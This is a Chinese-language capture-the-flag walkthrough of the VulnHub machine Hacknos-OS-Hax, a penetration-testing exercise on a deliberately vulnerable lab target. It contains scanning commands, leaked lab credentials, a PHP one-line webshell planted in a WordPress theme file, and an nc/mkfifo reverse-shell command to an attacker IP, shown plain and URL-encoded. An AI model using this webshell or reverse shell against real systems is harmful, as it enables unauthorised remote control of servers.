Hacknos-OS-Hax靶机

靶机地址：https://www.vulnhub.com/entry/hacknos-os-hax,389/

一、信息收集

步骤一：导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下：

步骤二：主机发现

nmap 192.168.7.0/24

对应靶机的MAC地址得到IP为192.168.7.204

步骤三：端口扫描

nmap -sV  -p- 192.168.7.204

得到开放的端口为22——ssh服务，80——http服务

步骤四：浏览器访问

步骤五：使用dirsearch扫描目录的时候查看页面有没有关键功能点

发现无特殊功能点😭

dirsearch -u http://192.168.7.204/

步骤六：拼接/img

点击到flaghost.png图片后，出现：

也许是图片隐写，那就将图片拖到kali中， 查看图片属性，得到字符 passw@45

exiftool flaghost.png

步骤七：拼接wordpress/wp-login.php，发现一个登录框

很明显这是使用了Wordpress的CMS

拼接/wordpress/

发现站点点击链接进行跳转的时候是localhost这个地址，那就需要对其进行绑定

在burp中对靶机的IP与localhost进行绑定

刷新，发现网页恢复正常

步骤八：弱口令登录发现登录不成功

根据上方得到的字符 passw@45

先猜想为密码，使用wordpress默认用户名登录，无果

猜想为页面目录，访问http://172.16.1.197/passw@45

步骤九：点击flag2.txt，显示

使用在线解密网站：https://www.splitbrain.org/services/ook

解密成功 账号密码 web Hacker@4514

点击Users查看用户，发现web用户是超级管理员

二、WebShell

可以通过写主题拿Webshell，点击Appearance—>Theme Editor—>header.php写入一句话木马..保存通过首页进行访问...

system($_REQUEST['cmd']);

访问?cmd=id

步骤十：使用BP抓包并将数据包修改为POST请求，修改cmd的值为以下反弹shell的语法并在Kali攻击机上使用nc监听本地4455端口接收shell反弹...

反弹shell语句

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.7.250 4455 >/tmp/f

输入后选中反弹语句，Ctrl+u进行URL编码为

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.7.250+4455+>/tmp/f

反弹成功